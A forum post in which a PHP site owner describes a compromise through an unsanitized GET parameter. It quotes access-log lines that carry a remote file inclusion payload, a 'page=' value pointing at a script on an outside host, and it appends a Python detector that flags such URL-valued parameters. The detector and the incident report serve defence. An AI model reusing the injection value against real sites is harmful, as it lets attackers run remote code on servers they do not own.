Hi Guys,
Recently I made a rookie mistake in my coding and didn't sanitize the input of one of my PHP $_GET variables. As a result, I woke up to find numerous files and folders on my server and over 1400 spam emails sent from my SMTP.
I'll hold my hands up and admit epic fail on this one....
However, I diligently went through my code that day and sanitized all inputs, removed all the dangerous files from the server, and expected no more trouble.
Thursday this week, they (or some other form of filth) got into my site yet again and planted more files trying to phish JP Morgan Chase Bank customers. Now looking at the logs, I can't immediately see how this could have been, except that I can see a lot of strange access logs that look like this:
120.164.19.158 - - [28/Oct/2010:11:16:59 -0500] "GET /images/index2_02.gif HTTP/1.1" 200 3314 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
and then, it seems that they managed to somehow upload a "readme.php" file which contained a lot of very advanced php code, most of which I couldn't make head or tail of.
This is the last entry in the logs before they started accessing the readme.php file:
120.164.19.158 - - [28/Oct/2010:11:18:05 -0500] "GET /advertising/www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5&source=&r=93361232 &block=1&blockcampaign=1&withtext=1&charset=ISO-8859-1&loc=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F&referer=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F HTTP/1.1" 200 4025 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
Anyone have any ideas how I can secure my site and ultimately stop these losers from raiding my server?
Thanks in advance
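Rather than eyeballing the log by hand, here is a small detector (an added example, not code from the original post) that walks Apache combined-format lines and flags any request target or Referer whose query string carries a parameter whose value is itself a URL, which is the signature of the `?page=http://...` remote file inclusion attempt visible in the lines quoted above. The sample lines are reconstructed from the post (the stray space in the second request line removed) plus one constructed benign request for contrast.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format; the Referer field is where the evidence sits in this post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ABSOLUTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample: the two lines quoted in the post (stray space removed from the
# second request line) plus one benign request for contrast.
SAMPLE_LOG = """\
120.164.19.158 - - [28/Oct/2010:11:16:30 -0500] "GET /?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
120.164.19.158 - - [28/Oct/2010:11:16:59 -0500] "GET /images/index2_02.gif HTTP/1.1" 200 3314 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
120.164.19.158 - - [28/Oct/2010:11:18:05 -0500] "GET /advertising/www/delivery/spc.php?zones=1%7C2%7C3%7C4%7C5&source=&r=93361232&block=1&blockcampaign=1&withtext=1&charset=ISO-8859-1&loc=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F&referer=http%3A//touringcaravanclub.com/%3Fpage%3Dhttp%3A//www.my-phone.ch/logs/spider.txt%3F%3F%3F%3F%3F%3F HTTP/1.1" 200 4025 "http://touringcaravanclub.com/?page=http://www.my-phone.ch/logs/spider.txt??????" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010061201 Firefox/3.0.19 Flock/2.6.0"
"""

def url_valued_params(url, depth=0):
    """(name, value) pairs whose decoded value is an absolute URL; URL values are
    inspected in turn, so 'page=http://...' nested inside 'loc=' still surfaces."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if ABSOLUTE_URL.match(value):
            hits.append((name, value))
            if depth < 2:
                hits.extend(url_valued_params(value, depth + 1))
    return hits

def find_rfi_attempts(log_text):
    """One finding per line whose request target or Referer carries a URL-valued parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than guess
        hits = url_valued_params(m['target']) + url_valued_params(m['referer'])
        if hits:
            findings.append({
                'ip': m['ip'], 'time': m['ts'], 'path': urlsplit(m['target']).path,
                'params': sorted({n for n, _ in hits}),
                'urls': sorted({v for _, v in hits}),
            })
    return findings

if __name__ == '__main__':
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} {f['path']} params={f['params']} urls={f['urls']}")
```

On the second quoted line the `loc` and `referer` hits are just the ad-server script echoing the page URL; the decisive indicator is the nested `page` parameter pointing at an external host, which is the unsanitized $_GET variable being fed a remote file.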